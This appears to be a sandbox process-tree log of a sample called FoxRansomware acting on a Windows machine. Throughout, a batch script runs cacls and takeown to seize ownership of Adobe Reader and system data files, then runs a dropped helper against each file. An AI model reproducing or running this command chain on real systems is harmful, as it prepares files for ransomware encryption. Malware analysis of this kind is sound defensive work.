    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "pdf.gif" -nobanner | PID 3384
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1452
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"" | PID 3948
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C | PID 3176
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" | PID 3876
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "server_issue.gif" -nobanner | PID 1780
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "server_issue.gif" -nobanner | PID 3328
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3976
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"" | PID 3016
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C | PID 3996
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" | Modifies file permissions | PID 1532
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner | PID 1748
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner | PID 584
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3132
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"" | PID 1712
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C | PID 2904
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" | PID 3272
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CourierStd.otf" -nobanner | PID 2088
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "CourierStd.otf" -nobanner | PID 2456
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3988
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"" | PID 2740
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C | PID 1516
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" | PID 2132
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "zx______.pfm" -nobanner | PID 540
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "zx______.pfm" -nobanner | PID 3836
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 2708
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"" | PID 2052
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C | PID 3672
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" | PID 1752
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner | PID 3684
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner | PID 2064
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3548
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"" | PID 3564
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C | PID 1164
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" | Modifies file permissions | PID 1368
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "can32.clx" -nobanner | PID 3576
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "can32.clx" -nobanner | PID 2212
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3080
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"" | PID 2060
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C | PID 1812
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" | PID 3796
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "symbol.txt" -nobanner | PID 1856
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "symbol.txt" -nobanner | PID 2236
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1808
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"" | PID 968
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C | PID 3024
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" | PID 3932
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "SYMBOL.TXT" -nobanner | PID 3020
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "SYMBOL.TXT" -nobanner | PID 1468
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1836
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"" | PID 1244
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C | PID 3952
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" | Modifies file permissions | PID 1708
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner | PID 3776
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "resource.xml" -nobanner | PID 2656
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3472
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"" | PID 3092
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C | PID 3324
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" | PID 2180
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner | PID 4032
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "resource.xml" -nobanner | PID 3716
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1048
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"" | PID 2728
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C | PID 2668
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" | PID 2556
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "behavior.xml" -nobanner | PID 1768
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "behavior.xml" -nobanner | PID 2608
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 4060
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"" | PID 3848
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C | PID 3680
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" | Modifies file permissions | PID 3224
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner | PID 3056
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "resource.xml" -nobanner | PID 344
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3832
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat"" | PID 612
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C | PID 3368
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat" | PID 2224
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "qmgr1.dat" -nobanner | PID 4036
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "qmgr1.dat" -nobanner | PID 2376
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 2432
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"" | PID 2352
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C | PID 2192
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" | Modifies file permissions | PID 852
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "RTC.der" -nobanner | PID 3568
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "RTC.der" -nobanner | PID 3476
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1592
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"" | PID 3252
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C | PID 3116
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" | Modifies file permissions | PID 3980
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "end_review.gif" -nobanner | PID 2032
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "end_review.gif" -nobanner | PID 2972
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 2168
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"" | PID 3128
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C | PID 320
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" | PID 3392
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "reviews_joined.gif" -nobanner | PID 3164
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "reviews_joined.gif" -nobanner | PID 2396
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3388
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"" | PID 2176
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C | PID 2628
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" | Modifies file permissions | PID 3484
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "server_ok.gif" -nobanner | PID 892
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "server_ok.gif" -nobanner | PID 1076
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1820
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"" | PID 924
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C | PID 2108
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" | Modifies file permissions | PID 3604
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "warning.gif" -nobanner | PID 3696
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "warning.gif" -nobanner | PID 2908
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1520
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"" | PID 2852
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C | PID 3316
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" | PID 2368
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "MinionPro-BoldIt.otf" -nobanner | PID 1764
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "MinionPro-BoldIt.otf" -nobanner | PID 3816
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3108
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"" | PID 3000
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C | PID 784
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" | PID 4068
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "SY______.PFB" -nobanner | PID 3556
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "SY______.PFB" -nobanner | PID 1760
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 2680
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"" | PID 2552
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C | PID 2128
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" | PID 3760
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "brt.hyp" -nobanner | PID 3296
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "brt.hyp" -nobanner | PID 232
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 2120
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"" | PID 224
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C | PID 3912
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" | Modifies file permissions | PID 2196
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "eng32.clx" -nobanner | PID 3188
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "eng32.clx" -nobanner | PID 1636
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1380
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"" | PID 2956
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C | PID 1876
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" | PID 1036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CENTEURO.TXT" -nobanner3⤵PID:1924
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "CENTEURO.TXT" -nobanner4⤵PID:3216
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3148
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""2⤵PID:3260
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C3⤵PID:3720
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"3⤵
- Modifies file permissions
PID:3016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "UKRAINE.TXT" -nobanner3⤵PID:880
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "UKRAINE.TXT" -nobanner4⤵PID:1664
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3068
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:3988
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:3380
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵PID:3120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "background.png" -nobanner3⤵PID:2252
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "background.png" -nobanner4⤵PID:2132
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2924
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""2⤵PID:4084
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C3⤵PID:284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"3⤵PID:2676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "tasks.xml" -nobanner3⤵PID:1752
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "tasks.xml" -nobanner4⤵PID:272
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1068
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""2⤵PID:3548
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C3⤵PID:3624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"3⤵
- Modifies file permissions
PID:1632
-
-
